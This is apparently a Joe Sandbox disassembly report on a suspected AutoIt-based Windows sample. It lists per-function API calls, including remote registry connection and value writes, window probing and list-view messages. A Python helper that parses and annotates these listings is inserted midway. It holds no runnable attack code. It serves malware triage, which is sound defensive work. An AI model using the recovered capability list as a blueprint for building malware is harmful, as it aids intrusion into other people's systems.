                                                                                                                                                                                                                                                        • Part of subcall function 00EDB63C: GetAsyncKeyState.USER32(00000002), ref: 00EDB69F
                                                                                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00EDAB87), ref: 00EDAA79
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                      • Opcode ID: 9b46f5a9543dcc795d6df95ab0b30a2134a99cbe7aeb260f7d1bc54be6424a5f
                                                                                                                                                                                                                                                      • Instruction ID: f02ee663eab16a23229a13529c28967390e437ec6a2109a510bbd3e6053662f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b46f5a9543dcc795d6df95ab0b30a2134a99cbe7aeb260f7d1bc54be6424a5f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94B1AE75A0020A9FDB14DFA8DC45BED7BB8FB08324F15422AFA15A7390DB34D942EB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Foreground
                                                                                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                                      • API String ID: 62970417-1919597938
                                                                                                                                                                                                                                                      • Opcode ID: 3e6545daa344bf38822931604c3cc0a78d82fcf0517fb6a2e90bcb6d836fda73
                                                                                                                                                                                                                                                      • Instruction ID: e853fe96cd1092943595151c86fc77aba29bc6aedef6eb9367017c60cb4ccb27
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e6545daa344bf38822931604c3cc0a78d82fcf0517fb6a2e90bcb6d836fda73
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79D1F630508246DBCB44EF20C981A9AFBF0FF54364F10591DF45A672A2DB31E99BEB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F23735
                                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F5DC00,00000000,?,00000000,?,?), ref: 00F237A3
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F237EB
                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F23874
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00F23B94
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F23BA1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                                                                                                                                                      • Opcode ID: 47de226cae4cd2d36622709684b1e207eb930dff1f1fecb49dfb4889c0784c76
                                                                                                                                                                                                                                                      • Instruction ID: 607aeaf4ccb352e3810636bd8363d87619575415fc568c42fadc66ae9b04d0ee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47de226cae4cd2d36622709684b1e207eb930dff1f1fecb49dfb4889c0784c76
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 060267756046119FCB14EF28D945E2EB7E5FF88720F04845DF98AAB2A2CB35ED01DB81
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00F26C56
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F26D16
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                      • API String ID: 3974292440-719923060
                                                                                                                                                                                                                                                      • Opcode ID: 2113a895e0f0f0657174a4b1041c26d9a06f5a216bbd3b984ff26c25853839b8
                                                                                                                                                                                                                                                      • Instruction ID: be855753bc245763160791e27a44e541504c772eef9a2b8b00dddeb5daca2723
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2113a895e0f0f0657174a4b1041c26d9a06f5a216bbd3b984ff26c25853839b8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1A18C312143559BCB14EF20DA51B6AB3E1FF84314F10996DB956AB3D2EB31EC06DB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00EFCF91
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EFD032
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD045
                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EFD09A
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD0D6
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00EFD10D
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00EFD15F
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EFD195
                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EFD1B3
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(00000000), ref: 00EFD1BA
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00EFD234
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD248
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00EFD26E
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD282
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                                                                                                                      • String ID: %s%u
                                                                                                                                                                                                                                                      • API String ID: 3119225716-679674701
                                                                                                                                                                                                                                                      • Opcode ID: 5da81cdb428c25b45f6b360c7560cceb4ccb52105087e1ed826689e485885add
                                                                                                                                                                                                                                                      • Instruction ID: 5ab653e59da67230050cbb6ef48e550658e63d82fe488aa238b99a55e24bc941
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5da81cdb428c25b45f6b360c7560cceb4ccb52105087e1ed826689e485885add
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0A1B07120820AABD715DF64CC84FBABBE9FF44318F105619FA99A2190DB30EA45CBD1
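The function listings above (the RegConnectRegistryW / RegCreateKeyExW / RegSetValueExW block, the SendMessageW list-view block and the GetClassNameW / SendMessageTimeoutW control-matching block) all use one line format: a module-qualified API, the argument values the analyser could recover, and the call-site address. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses that format, decodes the public Windows SDK constants that are visible in the recovered arguments (REG_* value types, LVM_* list-view messages, SMTO_ABORTIFHUNG and the timeout), and summarises what each function can do. The input is constructed from lines copied out of the listings above; the capability categories are the example's own assumption, and argument positions follow the listing's order, which Joe Sandbox recovers heuristically, so the decoded values are a triage hint rather than ground truth.

```python
"""Parse per-function API listings from a Joe Sandbox disassembly export and
summarise each function's capabilities.  Added example; not part of the report
and not the analysed sample's own code."""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed input, copied in the format of the listings above:
# "API.MODULE(args), ref: callsite".  LIBCMT entries carry no argument list.
SAMPLE_LISTING = """\
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F23735
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00F5DC00,00000000,?,00000000,?,?), ref: 00F237A3
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F23874
• RegCloseKey.ADVAPI32(00000000), ref: 00F23BA1
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F26D16
• __swprintf.LIBCMT ref: 00EFD032
• _wcscmp.LIBCMT ref: 00EFD045
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EFD09A
• GetClassNameW.USER32(?,?,00000100), ref: 00EFD234
Strings
"""

# One bullet line: optional bullet, API name, ".MODULE", optional "(args)",
# optional comma, then "ref: <8 hex digits>".
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>[A-Za-z_][\w@]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Public SDK constants used to annotate recovered arguments (winnt.h / commctrl.h / winuser.h).
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD",
             7: "REG_MULTI_SZ", 11: "REG_QWORD"}
LVM_FIRST = 0x1000
LVM_MESSAGES = {LVM_FIRST + 4: "LVM_GETITEMCOUNT", LVM_FIRST + 50: "LVM_GETSELECTEDCOUNT",
                LVM_FIRST + 115: "LVM_GETITEMTEXTW", LVM_FIRST + 142: "LVM_SETVIEW"}
SMTO_ABORTIFHUNG = 0x0002

# Capability buckets are this example's own triage assumption, not a Joe Sandbox taxonomy.
CAPABILITIES = {
    "registry-write": {"RegCreateKeyExW", "RegSetValueExW"},
    "remote-registry": {"RegConnectRegistryW"},
    "window-probing": {"GetClassNameW", "GetWindowTextW", "SendMessageTimeoutW"},
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple   # raw argument tokens; "?" means the analyser could not resolve the value
    ref: int      # call-site address inside the dumped image


def parse_listing(text: str) -> list[ApiCall]:
    """Turn the bullet lines of one function listing into ApiCall records; headings are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def _hexarg(args: tuple, i: int):
    """Argument i as an int, or None when it is absent or unresolved ("?")."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def annotate(call: ApiCall) -> str:
    """Decode well-known constants in a call's arguments.  Positions follow the listing's
    order, which is recovered heuristically, so treat the result as a hint."""
    if call.api == "RegSetValueExW":
        t = _hexarg(call.args, 3)                          # dwType
        return "value type ?" if t is None else "value type " + REG_TYPES.get(t, "0x%x" % t)
    if call.api == "SendMessageW":
        msg = _hexarg(call.args, 1)                        # Msg
        return "msg ?" if msg is None else LVM_MESSAGES.get(msg, "msg 0x%04x" % msg)
    if call.api == "SendMessageTimeoutW":
        flags, timeout = _hexarg(call.args, 4), _hexarg(call.args, 5)  # fuFlags, uTimeout
        parts = []
        if flags is not None and flags & SMTO_ABORTIFHUNG:
            parts.append("SMTO_ABORTIFHUNG")
        if timeout is not None:
            parts.append("timeout=%dms" % timeout)
        return " ".join(parts)
    return ""


def capabilities(calls: list[ApiCall]) -> list[str]:
    """Sorted capability tags for one function, from its API set plus any LVM_* message."""
    names = {c.api for c in calls}
    tags = {cap for cap, apis in CAPABILITIES.items() if names & apis}
    if any(c.api == "SendMessageW" and (_hexarg(c.args, 1) or 0) & 0xFF00 == LVM_FIRST for c in calls):
        tags.add("listview-control")
    return sorted(tags)


def module_histogram(calls: list[ApiCall]) -> Counter:
    """Which DLLs a function leans on; a quick way to spot ADVAPI32-heavy (registry) code."""
    return Counter(c.module for c in calls)


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for c in parsed:
        print("%08X %-22s %-8s %s" % (c.ref, c.api, c.module, annotate(c)))
    print("capabilities:", capabilities(parsed))
    print("modules:", dict(module_histogram(parsed)))
```

Running it on the constructed listing prints one decoded line per call and tags the set as registry-write, remote-registry, window-probing and listview-control, which is a faster read than the raw bullets when the export runs to thousands of functions. The REG_* decode of RegSetValueExW's fourth argument only means something when the analyser actually recovered a constant there; on the listing above it shows 00000002, which the table maps to REG_EXPAND_SZ, but an unresolved "?" is reported as such rather than guessed.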
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 00EFD8EB
• _wcscmp.LIBCMT ref: 00EFD8FC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 00EFD924
• CharUpperBuffW.USER32(?,00000000), ref: 00EFD941
• _wcscmp.LIBCMT ref: 00EFD95F
• _wcsstr.LIBCMT ref: 00EFD970
• GetClassNameW.USER32(00000018,?,00000400), ref: 00EFD9A8
• _wcscmp.LIBCMT ref: 00EFD9B8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 00EFD9DF
• GetClassNameW.USER32(00000018,?,00000400), ref: 00EFDA28
• _wcscmp.LIBCMT ref: 00EFDA38
• GetClassNameW.USER32(00000010,?,00000400), ref: 00EFDA60
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 00EFDAC9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                                                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                                                                                                                                                      • Opcode ID: 94d956519c822eb921c2f245dd06996f8a3ab85423bd301cea71b32f2e45adf9
                                                                                                                                                                                                                                                      • Instruction ID: 6cfb22023ebbd005a73ed2db5666489519be1a8e0ea2d7cb216116db8cdf2b9e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94d956519c822eb921c2f245dd06996f8a3ab85423bd301cea71b32f2e45adf9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B81A23100C2499BDB05DF50CC85F7A7BD9EF85318F049469EE89AA095DB70D945CBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                                                                                                                                                      • Opcode ID: 06e8b92068015f20822c28eb35e5038fbe9e98774a1f50961464f3614dbd66ec
                                                                                                                                                                                                                                                      • Instruction ID: 79fa2661a34936cbbac2c75e09466e9b690b01b16d4d70e438c109386483b581
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06e8b92068015f20822c28eb35e5038fbe9e98774a1f50961464f3614dbd66ec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3531BC32A4824CAADB19FA50CE43FEE77F59F20354F30202AF545710D1EB62AE45D613
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00EFEAB0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EFEAC2
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00EFEAD9
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00EFEAEE
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00EFEAF4
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EFEB04
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00EFEB0A
                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EFEB2B
                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EFEB45
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EFEB4E
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00EFEBB9
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EFEBBF
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EFEBC6
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EFEC12
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00EFEC1F
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EFEC44
                                                                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EFEC6F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3869813825-0
                                                                                                                                                                                                                                                      • Opcode ID: 8c5a5f7f44d09713d7805ae88a2663b825625fb00e4615626b7e4d0672055ebd
                                                                                                                                                                                                                                                      • Instruction ID: 7016353a45580d69b9d14d48125a2eb4a5cd5f51103a626f88c5b585f6f00d9e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c5a5f7f44d09713d7805ae88a2663b825625fb00e4615626b7e4d0672055ebd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7513A7590070DAFDB21DFA8CD89B6EBBF5FF04709F004928E686A26A0D774B945DB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00F179C6
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00F179D1
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00F179DC
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00F179E7
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00F179F2
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00F179FD
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00F17A08
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00F17A13
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00F17A1E
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00F17A29
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00F17A34
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00F17A3F
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00F17A4A
• LoadCursorW.USER32(00000000,00007F04), ref: 00F17A55
• LoadCursorW.USER32(00000000,00007F02), ref: 00F17A60
• LoadCursorW.USER32(00000000,00007F89), ref: 00F17A6B
• GetCursorInfo.USER32(?), ref: 00F17A7B
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
